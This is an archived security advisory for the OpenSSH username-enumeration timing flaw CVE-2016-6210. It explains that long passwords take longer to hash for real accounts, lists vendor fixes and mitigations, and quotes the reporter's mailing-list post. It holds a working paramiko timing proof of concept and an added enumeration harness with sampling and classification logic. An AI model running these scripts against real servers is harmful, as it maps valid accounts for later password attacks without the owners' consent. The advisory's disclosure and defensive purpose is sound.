SecurityTracker Archives

Category: Application (VPN) > OpenSSH
Vendors: OpenSSH.org
OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
SecurityTracker Alert ID:  1036319
SecurityTracker URL:  http://securitytracker.com/id/1036319
CVE Reference:   CVE-2016-6210
Updated:  Aug 1 2016
Original Entry Date:  Jul 16 2016
Impact:   Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 7.2p2; possibly prior versions
Description:   A vulnerability was reported in OpenSSH. A remote user can determine valid usernames on the target system.

A remote user can send an authentication request with a very long password (approximately 10,000 characters) to the target ssh daemon and measure how long the server takes to reject it. For a username that does not exist, sshd compares the supplied password against a hard-coded fake Blowfish ($2) hash; for a valid account it runs the system's crypt(3) against the account's real hash. Blowfish (bcrypt) only uses the first 72 bytes of a password, so its cost is fixed, whereas SHA-256/SHA-512 crypt feeds the whole password into each of its rounds, so its cost grows with the password length. On systems where valid users' passwords are hashed with SHA256/SHA512, the response is therefore measurably faster for a non-existent username than for a valid username. Because the signal is a timing difference, a practical test takes several samples per username and compares them against a baseline username known not to exist, so that network jitter does not produce false positives.
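As an added illustration (this is editor-written example code, not code from SecurityTracker, the reporter, or the OpenSSH project), the block below models the pre-7.3 server-side behaviour described above and shows how a tester turns the timing difference into a yes/no decision per username. The account table, the two cost models (SHA-512 crypt modelled as 5000 rounds that each absorb the full password, the Blowfish fake hash modelled as a fixed number of rounds over at most 72 bytes), the cost parameter and the 1.5x threshold are constructed assumptions for the demonstration; the models do their work with plain SHA-512 so the script runs offline and are not real crypt(3) or bcrypt implementations. Against a live sshd, `simulated_sshd_auth` would be swapped for a function that performs one password attempt over the network (for example with paramiko, as in the reporter's sample code) and the sampling and classification logic stays the same.

```python
import hashlib
import secrets
import statistics
import time
from typing import Callable, Dict, Iterable, List

# Constructed account table for the simulated server; stands in for the
# "does this user exist" lookup sshd performs (assumption, not real data).
VALID_USERS = {"alice", "bob"}


def sha512crypt_work(password: bytes, rounds: int = 5000) -> int:
    """Cost model of glibc sha512crypt (simplified, not the real algorithm):
    the password is mixed into every one of the `rounds` SHA-512 calls, so the
    work grows linearly with len(password). Returns the number of bytes hashed."""
    digest = hashlib.sha512(password).digest()
    hashed = len(password)
    for _ in range(rounds):
        digest = hashlib.sha512(digest + password).digest()
        hashed += len(digest) + len(password)
    return hashed


def bcrypt_work(password: bytes, cost: int = 6) -> int:
    """Cost model of the Blowfish ($2) fake hash sshd used for unknown users
    (simplified, not real bcrypt): bcrypt only keys on the first 72 bytes, so
    the work does not change however long the supplied password is.
    The cost parameter is an assumption for the demo."""
    key = password[:72]
    digest = hashlib.sha512(key).digest()
    hashed = len(key)
    for _ in range(2 ** cost):
        digest = hashlib.sha512(digest + key).digest()
        hashed += len(digest) + len(key)
    return hashed


def simulated_sshd_auth(username: str, password: bytes) -> bool:
    """Pre-7.3 behaviour from the advisory: a real account is checked against
    its SHA-512 crypt hash, an unknown one against the fake $2 hash.
    The probe password is never correct, so this always returns False."""
    if username in VALID_USERS:
        sha512crypt_work(password)
    else:
        bcrypt_work(password)
    return False


def time_probe(auth: Callable[[str, bytes], bool], username: str,
               password: bytes, samples: int) -> List[float]:
    """Wall-clock time of `samples` failed logins for one username."""
    timings = []
    for _ in range(samples):
        start = time.perf_counter()
        auth(username, password)
        timings.append(time.perf_counter() - start)
    return timings


def classify(timings: Dict[str, List[float]], baseline: str,
             ratio: float = 1.5) -> Dict[str, bool]:
    """Mark a username as valid when the median of its timings exceeds the
    median of `baseline` (a username known not to exist) by `ratio`.
    Medians, not single samples, so one slow packet cannot flip the verdict."""
    base = statistics.median(timings[baseline])
    return {user: statistics.median(t) > base * ratio
            for user, t in timings.items() if user != baseline}


def enumerate_users(auth: Callable[[str, bytes], bool],
                    candidates: Iterable[str],
                    password: bytes = b"A" * 10000,
                    samples: int = 5) -> Dict[str, bool]:
    """Probe each candidate plus a random, almost certainly absent, baseline."""
    baseline = "probe-" + secrets.token_hex(8)
    timings = {u: time_probe(auth, u, password, samples)
               for u in [baseline, *candidates]}
    return classify(timings, baseline)


if __name__ == "__main__":
    # Constructed candidate list; only "alice" and "bob" exist in VALID_USERS.
    print(enumerate_users(simulated_sshd_auth, ["alice", "mallory", "bob", "root"]))
```

The baseline username is generated randomly for each run so the "invalid" reference is not itself a guessable account, and the threshold is a ratio rather than an absolute time so the same harness works over a slow link as well as on loopback. Against a real server the per-sample numbers are dominated by the round trip, which is why the reporter's note about using the server's TCP timestamps, where available, gives a cleaner signal.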

Eddie Harari reported this vulnerability.

Impact:   A remote user can determine valid usernames on the target system.
Solution:   The vendor has issued a fix (7.3). According to the 7.3 release notes, sshd now refuses password authentication requests longer than 1024 characters and mitigates the timing difference between valid and invalid account names. Where upgrading is not immediately possible, setting PasswordAuthentication no in sshd_config (and ChallengeResponseAuthentication no, unless keyboard-interactive login is required) removes the password-hashing path that the measurement depends on.

The vendor advisory is available at:

http://www.openssh.com/txt/release-7.3

Vendor URL:  www.openssh.com/txt/release-7.3
Cause:   State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 15 2016 (Ubuntu Issues Fix) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
Ubuntu has issued a fix for Ubuntu Linux 12.04 LTS, 14.04 LTS, and 16.04 LTS.
Sep 24 2016 (IBM Issues Fix for IBM AIX) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
IBM has issued a fix for IBM AIX 5.3, 6.1, 7.1, and 7.2.
Dec 2 2016 (Palo Alto Networks Issues Fix for Palo Alto PAN-OS) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
Palo Alto Networks has issued a fix for Palo Alto PAN-OS.
Aug 31 2017 (Red Hat Issues Fix) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
Red Hat has issued a fix for Red Hat Enterprise Linux 6.
Jan 12 2018 (IBM Issues Fix for IBM Security Access Manager Appliance) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
IBM has issued a fix for IBM Security Access Manager Appliance.



 Source Message Contents

Subject:  [FD] opensshd - user enumeration

Sorry for the resend, I changed the format of the email to better fit the list...

--------------------------------------------------------------------
User Enumeration using Open SSHD (<=Latest version).
-------------------------------------------------------------------

Abstract:
-----------
By sending large passwords, a remote user can enumerate users on a system that runs SSHD. This problem exists in most modern configurations because it takes much longer to calculate a SHA256/SHA512 hash than a BLOWFISH hash.

CVE-ID
---------
CVE-2016-6210

Tested versions
--------------------
This issue was tested on opensshd-7.2p2 (should be possible on most earlier versions as well).

Fix
-----------------
This issue was reported to the OPENSSH developer group and they have sent a patch (don't know if the patch was released yet).
(thanks to 'dtucker@zip.com.au' for his quick reply and fix suggestion).

Details
----------------
When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD source code. On this hard-coded password structure the password hash is based on the BLOWFISH ($2) algorithm.
If real users' passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in a shorter response time from the server for non-existing users.

Sample code:
----------------
import time

import paramiko

# Probe password: far past the 72-byte limit of the fake bcrypt hash, so
# SHA-256/SHA-512 crypt on a real account does measurably more work.
user = input("user: ")
p = 'A' * 25000

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

starttime = time.perf_counter()
try:
    # Password auth only: agent/key attempts would add unrelated delay.
    ssh.connect('127.0.0.1', username=user, password=p,
                allow_agent=False, look_for_keys=False)
except (paramiko.AuthenticationException, paramiko.SSHException):
    pass  # the login is expected to fail; only the elapsed time matters
finally:
    endtime = time.perf_counter()
    ssh.close()
total = endtime - starttime
print(total)

(Valid users will result in higher total time).

*** please note that if the SSHD configuration prohibits root login, then root is not considered a valid user...

*** when the TCP timestamp option is enabled, the best way to measure the time would be using the timestamps from the server's TCP packets, since this will eliminate any network delays on the way.

Eddie Harari,


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Copyright 2019, SecurityGlobal.net LLC